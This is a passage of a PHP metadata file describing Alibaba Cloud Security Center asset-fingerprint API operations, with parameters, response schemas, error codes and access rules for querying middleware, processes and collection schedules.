'example' => 'openssl', 'title' => ''], ], [ 'name' => 'BizType', 'in' => 'query', 'schema' => ['description' => 'The type of the middleware, database, or web service to query. Valid values: '."\n" .'- **system_service**: system service'."\n" .'- **software_library**: software library'."\n" .'- **docker_component**: container component'."\n" .'- **database**: database'."\n" .'- **web_container**: web container'."\n" .'- **jar**: JAR package'."\n" .'- **web_framework**: web framework', 'type' => 'string', 'required' => false, 'example' => 'system_service', 'title' => ''], ], [ 'name' => 'SearchItemSub', 'in' => 'query', 'schema' => ['description' => 'The type of the sub-query condition. Valid values:'."\n" .'- **port**: port'."\n" .'- **pid**: process ID'."\n" .'- **version**: version'."\n" .'- **user**: user', 'type' => 'string', 'required' => false, 'example' => 'version', 'title' => ''], ], [ 'name' => 'SearchInfoSub', 'in' => 'query', 'schema' => ['description' => 'The content of the sub-query condition. The content varies based on the value of **SearchItemSub**:'."\n" .'- If **SearchItemSub** is set to **port**, enter the port number.'."\n" .'- If **SearchItemSub** is set to **pid**, enter the process ID.'."\n" .'- If **SearchItemSub** is set to **version**, enter the version of the middleware, database, or web service.'."\n" .'- If **SearchItemSub** is set to **user**, enter the username.'."\n" ."\n" .'> Sub-query conditions help you search for the data list of a specific middleware, database, or web service.', 'type' => 'string', 'required' => false, 'example' => '1.0.2k', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The search condition (server name or IP address).'."\n" .'> Fuzzy match is supported.', 'type' => 'string', 'required' => false, 'example' => '192.168', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the middleware, database, or web service.'."\n" .'> This parameter is deprecated. You do not need to configure it.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server on which the middleware, database, or web service is deployed.', 'type' => 'string', 'required' => false, 'example' => 'uuid-02ebabe7-1c19-ab****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return in the query results. Default value: **1**, which indicates that the results start from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'Settings the number of entries per page in a paged query for Asset Fingerprints information. Default value: **10**, which indicates that 10 entries of Asset Fingerprints information are displayed per page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'ScaVersion', 'in' => 'query', 'schema' => ['description' => 'The version of the middleware, database, or web service.', 'type' => 'string', 'required' => false, 'example' => '1.0.2k', 'title' => ''], ], [ 'name' => 'Port', 'in' => 'query', 'schema' => ['description' => 'The port on which the process listens.', 'type' => 'string', 'required' => false, 'example' => '68', 'title' => ''], ], [ 'name' => 'User', 'in' => 'query', 'schema' => ['description' => 'The user that runs the process.', 'type' => 'string', 'required' => false, 'example' => 'root', 'title' => ''], ], [ 'name' => 'Pid', 'in' => 'query', 'schema' => ['description' => 'The process ID.', 'type' => 'string', 'required' => false, 'example' => '756', 'title' => ''], ], [ 'name' => 'ProcessStartedStart', 'in' => 'query', 'schema' => ['description' => 'The start of the time range to query for process startup timestamps. Unit: seconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1641024565', 'title' => ''], ], [ 'name' => 'ProcessStartedEnd', 'in' => 'query', 'schema' => ['description' => 'The end of the time range to query for process startup timestamps. Unit: seconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1641110965', 'title' => ''], ], [ 'name' => 'ScaNamePattern', 'in' => 'query', 'schema' => ['description' => 'The process name.', 'type' => 'string', 'required' => false, 'example' => 'open', 'title' => ''], ], [ 'name' => 'UseNextToken', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to use the NextToken method to retrieve asset list data. If this parameter is used, TotalCount is no longer returned. Valid values:'."\n" ."\n" .'- **true**: Use the NextToken method.'."\n" .'- **false**: Do not use the NextToken method.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'NextToken', 'in' => 'query', 'schema' => ['description' => 'The token that marks the current position from which to start reading. Leave this parameter empty to start from the beginning.'."\n" ."\n" .'> You do not need to set this parameter for the first call. The response includes the NextToken value for the next call. Each subsequent response contains the NextToken value for the following call.', 'type' => 'string', 'required' => false, 'example' => 'AAAAAV3MpHK1AP0pfERHZN5pu6k+AtdhNE3kgQEK36GujZ5on+tWdc+4WoaoMP/kUNxxxx', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F9146867-16C8-4AAB-BB4FB8C2A4', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in the paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page in the paged query for Asset Fingerprints information. Default value: **10**, which indicates that 10 entries of Asset Fingerprints information are displayed per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of Asset Fingerprints entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in the paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'NextToken' => ['description' => 'The NextToken value returned when the NextToken method is used.', 'type' => 'string', 'example' => 'B60***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Propertys' => [ 'description' => 'The details of the Asset Fingerprints list.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the middleware, database, or web service.', 'type' => 'string', 'example' => 'library', 'title' => ''], 'BizTypeDispaly' => ['description' => 'The display name of the middleware, database, or web service type. Valid values:'."\n" ."\n" .''."\n" .'- 系统服务'."\n" .'- 软件库'."\n" .'- 容器组件'."\n" .'- 数据库'."\n" .'- Web容器'."\n" .'- Jar包'."\n" .'- Web框架'."\n" .''."\n" .''."\n" .'- System Service'."\n" .'- Software Library'."\n" .'- Docker Component'."\n" .'- Database'."\n" .'- Web Container'."\n" .'- Jar'."\n" .'- Web Framework'."\n" .'', 'type' => 'string', 'example' => 'System Service', 'title' => ''], 'ProcessStarted' => ['description' => 'The timestamp when the process started. Unit: seconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1596539788', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server on which the middleware, database, or web service is deployed.', 'type' => 'string', 'example' => '47.42.XX.XX', 'title' => ''], 'ConfigPath' => ['description' => 'The path of the configuration file.', 'type' => 'string', 'example' => '/etc/my.cnf', 'title' => ''], 'Pid' => ['description' => 'The process ID.', 'type' => 'string', 'example' => '756', 'title' => ''], 'Port' => ['description' => 'The service port of the middleware, database, or web service.', 'type' => 'string', 'example' => '68', 'title' => ''], 'Cmdline' => ['description' => 'The command line of the process.', 'type' => 'string', 'example' => '/sbin/dhclient -H iz2zeflhhbtk8gtxzt087az -1 -q -lf /var/lib/dhclient/dhclient--eth0.lease -pf /var/run/dhclient-eth0.pid eth0', 'title' => ''], 'BizType' => ['description' => 'The type of the middleware, database, or web service. Valid values:'."\n" .'- **system_service**: system service'."\n" .'- **software_library**: software library'."\n" .'- **docker_component**: container component'."\n" .'- **database**: database'."\n" .'- **web_container**: web container'."\n" .'- **jar**: JAR package'."\n" .'- **web_framework**: web framework', 'type' => 'string', 'example' => 'software_library', 'title' => ''], 'ListenIp' => ['description' => 'The IP address on which the process listens.', 'type' => 'string', 'example' => '0.0.XX.XX', 'title' => ''], 'Version' => ['description' => 'The version of the middleware, database, or web service.', 'type' => 'string', 'example' => '1.0.2k', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server on which the middleware, database, or web service is deployed.', 'type' => 'string', 'example' => 'Test01', 'title' => ''], 'ListenStatus' => ['description' => 'The listening status of the process. Valid values:'."\n" .'- **NONE**: not listening'."\n" .'- **LISTEN**: listening', 'type' => 'string', 'example' => 'NONE', 'title' => ''], 'Name' => ['description' => 'The name of the middleware, database, or web service.', 'type' => 'string', 'example' => 'openssl', 'title' => ''], 'Ip' => ['description' => 'The public IP address of the server on which the middleware, database, or web service is deployed.', 'type' => 'string', 'example' => '47.42.XX.XX', 'title' => ''], 'ProcessUser' => ['description' => 'The username of the user that runs the process.', 'type' => 'string', 'example' => 'root', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server on which the middleware, database, or web service is deployed.', 'type' => 'string', 'example' => 'i-2zeclqj7ti****', 'title' => ''], 'WebPath' => ['description' => 'The web directory.', 'type' => 'string', 'example' => '/usr/share/nginx/html', 'title' => ''], 'Ppid' => ['description' => 'The parent process ID.', 'type' => 'string', 'example' => '1', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server on which the middleware, database, or web service is deployed.', 'type' => 'string', 'example' => '192.210.XX.XX', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server on which the middleware, database, or web service is deployed.', 'type' => 'string', 'example' => 'uuid-02ebabe7-1c19-a****', 'title' => ''], 'ListenProtocol' => ['description' => 'The protocol on which the process listens. Valid values:'."\n" .'- **UDP**'."\n" .'- **TCP**', 'type' => 'string', 'example' => 'UDP', 'title' => ''], 'ImageName' => ['description' => 'The image name.', 'type' => 'string', 'example' => 'registry-vpc.cn-beijing.aliyuncs.com/acs/aliyun-ingress-controller****', 'title' => ''], 'Path' => ['description' => 'The path of the middleware, database, or web service.', 'type' => 'string', 'example' => '/usr/lib64/libssl.so.1.0.2k', 'title' => ''], 'ContainerName' => ['description' => 'The container name.', 'type' => 'string', 'example' => '5-rce_web_1', 'title' => ''], 'Proof' => ['description' => 'The version verification information of the middleware, database, or web service.', 'type' => 'string', 'example' => '/usr/lib64/libssl.so.1.0.2k', 'title' => ''], 'CreateTimestamp' => ['description' => 'The timestamp of the latest scan, which indicates the most recent time when Security Center collected middleware, database, or web service information. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1597987834000', 'title' => ''], 'RuntimeEnvVersion' => ['description' => 'The runtime environment version.'."\n" .'> For example, the JDK version of the Java process runtime environment.', 'type' => 'string', 'example' => '1.8.0_144', 'title' => ''], 'PodName' => ['description' => 'The pod name.', 'type' => 'string', 'example' => 'hello-pod', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F9146867-16C8-4AAB-BB4FB8C2A4\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 2,\\n \\"Count\\": 2,\\n \\"NextToken\\": \\"B60***\\"\\n },\\n \\"Propertys\\": [\\n {\\n \\"Type\\": \\"library\\",\\n \\"BizTypeDispaly\\": \\"System Service\\",\\n \\"ProcessStarted\\": 1596539788,\\n \\"InternetIp\\": \\"47.42.XX.XX\\",\\n \\"ConfigPath\\": \\"/etc/my.cnf\\",\\n \\"Pid\\": \\"756\\",\\n \\"Port\\": \\"68\\",\\n \\"Cmdline\\": \\"/sbin/dhclient -H iz2zeflhhbtk8gtxzt087az -1 -q -lf /var/lib/dhclient/dhclient--eth0.lease -pf /var/run/dhclient-eth0.pid eth0\\",\\n \\"BizType\\": \\"software_library\\",\\n \\"ListenIp\\": \\"0.0.XX.XX\\",\\n \\"Version\\": \\"1.0.2k\\",\\n \\"InstanceName\\": \\"Test01\\",\\n \\"ListenStatus\\": \\"NONE\\",\\n \\"Name\\": \\"openssl\\",\\n \\"Ip\\": \\"47.42.XX.XX\\",\\n \\"ProcessUser\\": \\"root\\",\\n \\"InstanceId\\": \\"i-2zeclqj7ti****\\",\\n \\"WebPath\\": \\"/usr/share/nginx/html\\",\\n \\"Ppid\\": \\"1\\",\\n \\"IntranetIp\\": \\"192.210.XX.XX\\",\\n \\"Uuid\\": \\"uuid-02ebabe7-1c19-a****\\",\\n \\"ListenProtocol\\": \\"UDP\\",\\n \\"ImageName\\": \\"registry-vpc.cn-beijing.aliyuncs.com/acs/aliyun-ingress-controller****\\",\\n \\"Path\\": \\"/usr/lib64/libssl.so.1.0.2k\\",\\n \\"ContainerName\\": \\"5-rce_web_1\\",\\n \\"Proof\\": \\"/usr/lib64/libssl.so.1.0.2k\\",\\n \\"CreateTimestamp\\": 1597987834000,\\n \\"RuntimeEnvVersion\\": \\"1.8.0_144\\",\\n \\"PodName\\": \\"hello-pod\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'Query middleware list details in asset fingerprints investigation', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyScaDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyScaDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribePropertyScaItem' => [ 'summary' => 'Queries middleware fingerprints.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92158', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], [ 'name' => 'ForceFlush', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to forcefully refresh the data that you want to query. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], ], [ 'name' => 'Biz', 'in' => 'query', 'schema' => ['description' => 'The type of the asset fingerprint that you want to query. Default value: **sca**. Valid values:'."\n" ."\n" .'* **sca**: middleware'."\n" .'* **sca_database**: database'."\n" .'* **sca_web**: web service'."\n" ."\n" .'> If you do not specify this parameter, the default value **sca** is used, which indicates that middleware fingerprints are queried.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sca', 'title' => ''], ], [ 'name' => 'SearchItem', 'in' => 'query', 'schema' => ['description' => 'The type of the search condition. Valid values:'."\n" ."\n" .'* **name**: the name of a database, middleware, or web service'."\n" .'* **type**: the type of a database, middleware, or web service'."\n" ."\n" .'> You must specify both the **SearchItem** and **SearchInfo** parameters before you can query the asset fingerprints based on the specified name or type.'."\n", 'type' => 'string', 'required' => false, 'example' => 'type', 'docRequired' => true, 'title' => ''], ], [ 'name' => 'SearchInfo', 'in' => 'query', 'schema' => ['description' => 'The search keyword. You must specify this parameter based on the value of the **SearchItem** parameter.'."\n" ."\n" .'* If the **SearchItem** parameter is set to **name**, you must enter the name of an asset fingerprint.'."\n" ."\n" .'* If the **SearchItem** parameter is set to **type**, you must enter the type of an asset fingerprint. Valid values:'."\n" ."\n" .' * **system_service**: system service'."\n" .' * **software_library**: software library'."\n" .' * **docker_component**: container component'."\n" .' * **database**: database'."\n" .' * **web_container**: web container'."\n" .' * **jar**: JAR package'."\n" .' * **web_framework**: web framework'."\n" ."\n" .'> You must specify both the **SearchItem** and **SearchInfo** parameters before you can query the asset fingerprints based on the specified name or type.'."\n", 'type' => 'string', 'required' => false, 'example' => 'system_service', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '3F4236AB-7070-538D-85EB-98EBFE6C****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '27', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'PropertyItems' => [ 'description' => 'An array that consists of the information about middleware fingerprints.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about middleware fingerprints.'."\n", 'type' => 'object', 'properties' => [ 'TypeDisplay' => ['description' => 'The display name of the middleware type.'."\n", 'type' => 'string', 'example' => 'Docker Component', 'title' => ''], 'Name' => ['description' => 'The name of the middleware.'."\n", 'type' => 'string', 'example' => 'kubelet', 'title' => ''], 'Count' => ['description' => 'The number of servers on which the middleware is run.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '23', 'title' => ''], 'BizType' => ['description' => 'The type of the middleware, database, or web service. Valid values:'."\n" ."\n" .'* **system_service**: system service'."\n" .'* **software_library**: software library'."\n" .'* **docker_component**: container component'."\n" .'* **database**: database'."\n" .'* **web_container**: web container'."\n" .'* **jar**: JAR package'."\n" .'* **web_framework**: web framework'."\n", 'type' => 'string', 'example' => 'docker_component', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribePropertyScaItem', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyScaItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyScaItem', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3F4236AB-7070-538D-85EB-98EBFE6C****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 27,\\n \\"Count\\": 20\\n },\\n \\"PropertyItems\\": [\\n {\\n \\"TypeDisplay\\": \\"Docker Component\\",\\n \\"Name\\": \\"kubelet\\",\\n \\"Count\\": 23,\\n \\"BizType\\": \\"docker_component\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribePropertyScaProcessDetail' => [ 'summary' => 'Queries the Java processes that are collected by the asset fingerprints feature of Security Center in your assets.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '223093', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The information about the server that you want to query. The value can be the public IP address, private IP address, or name of the server. Fuzzy match is supported.'."\n", 'type' => 'string', 'required' => false, 'example' => '10.167.XX.XX', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n" ."\n" .'> '."\n" ."\n" .'* You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.'."\n" ."\n" .'* Only exact match is supported.'."\n", 'type' => 'string', 'required' => false, 'example' => 'D0D6E6E4-CB8C-4897-B852-46AEFDA0****', 'title' => ''], ], [ 'name' => 'Pid', 'in' => 'query', 'schema' => ['description' => 'The process ID.'."\n" ."\n" .'> Only exact match is supported.'."\n", 'type' => 'string', 'required' => false, 'example' => '756', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page. Default value: 10. If you leave this parameter empty, 10 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Cmdline', 'in' => 'query', 'schema' => ['description' => 'The startup parameter.'."\n" ."\n" .'> This parameter supports only prefix queries. Fuzzy match is not supported.'."\n", 'type' => 'string', 'required' => false, 'example' => 'java -jar', 'title' => ''], ], [ 'name' => 'BizType', 'in' => 'query', 'schema' => ['description' => 'The type of the application process. Default value: **java**. Valid values:'."\n" ."\n" .'* **java**: Java process.'."\n" .'* **php**: PHP process.'."\n", 'type' => 'string', 'required' => false, 'example' => 'java', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'ADE57832-9666-511C-9A80-B87DE2E8****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page. Default value: **10**.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Propertys' => [ 'description' => 'The processes collected by the asset fingerprints feature.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the process.'."\n", 'type' => 'object', 'properties' => [ 'InternetIp' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'example' => '120.26.XX.XX', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.'."\n", 'type' => 'string', 'example' => 'i-hp35tftuh52wbp1g****', 'title' => ''], 'Cmdline' => ['description' => 'The command line of the process.'."\n", 'type' => 'string', 'example' => 'java -Xms128m -Xmx512m -DNACOS_URL=http://10.184.XX.XX:8848 -DNACOS_NAMESPACE=iam-sit -jar /opt/service/xxl-job/xxl-job-admin-2.3.0.jar', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'Name' => ['description' => 'The name of the process.'."\n", 'type' => 'string', 'example' => 'java', 'title' => ''], 'CreateTimestamp' => ['description' => 'The timestamp at which the last asset fingerprint collection is performed. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1597987834000', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the server.'."\n", 'type' => 'string', 'example' => 'hc-host-****', 'title' => ''], 'Pid' => ['description' => 'The ID of the process.'."\n", 'type' => 'string', 'example' => '522', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => '162eb349-c2d9-4f8b-805c-75b43d4c****', 'title' => ''], 'Version' => ['description' => 'The version of web application service.', 'type' => 'string', 'example' => '3.10.0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ADE57832-9666-511C-9A80-B87DE2E8****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 69,\\n \\"Count\\": 10\\n },\\n \\"Propertys\\": [\\n {\\n \\"InternetIp\\": \\"120.26.XX.XX\\",\\n \\"InstanceId\\": \\"i-hp35tftuh52wbp1g****\\",\\n \\"Cmdline\\": \\"java -Xms128m -Xmx512m -DNACOS_URL=http://10.184.XX.XX:8848 -DNACOS_NAMESPACE=iam-sit -jar /opt/service/xxl-job/xxl-job-admin-2.3.0.jar\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\",\\n \\"Name\\": \\"java\\",\\n \\"CreateTimestamp\\": 1597987834000,\\n \\"InstanceName\\": \\"hc-host-****\\",\\n \\"Pid\\": \\"522\\",\\n \\"Uuid\\": \\"162eb349-c2d9-4f8b-805c-75b43d4c****\\",\\n \\"Version\\": \\"3.10.0\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribePropertyScaProcessDetail', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyScaProcessDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyScaProcessDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribePropertyScheduleConfig' => [ 'summary' => 'Queries the configurations of scheduled tasks of asset fingerprint collection.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => [ 'description' => 'The type of the asset fingerprints. Valid values:'."\n" ."\n" .'* **scheduler_port_period**: listening port'."\n" .'* **scheduler_process_period**: running process'."\n" .'* **scheduler_account_period**: account'."\n" .'* **scheduler_software_period**: software'."\n" .'* **scheduler_cron_period**: scheduled task'."\n" .'* **scheduler_sca_period**: middleware'."\n" .'* **scheduler_autorun_period**: startup item'."\n" .'* **scheduler_lkm_period**: kernel module'."\n" .'* **scheduler_sca_proxy_period**: website'."\n", 'type' => 'string', 'required' => true, 'enumValueTitles' => [], 'example' => 'scheduler_autorun_period', 'title' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The configuration.'."\n", 'type' => 'object', 'properties' => [ 'Config' => ['description' => 'The configuration time. Unit: hours.'."\n" ."\n" .'> A value **0** indicates that asset fingerprint collection is disabled for this type of asset.'."\n", 'type' => 'string', 'example' => '3', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Config\\": \\"3\\",\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\"\\n}","type":"json"}]', 'title' => 'DescribePropertyScheduleConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribePropertyScheduleConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribePropertyScheduleConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribePropertySoftwareDetail' => [ 'methods' => ['post', 'get'], 'schemes' => 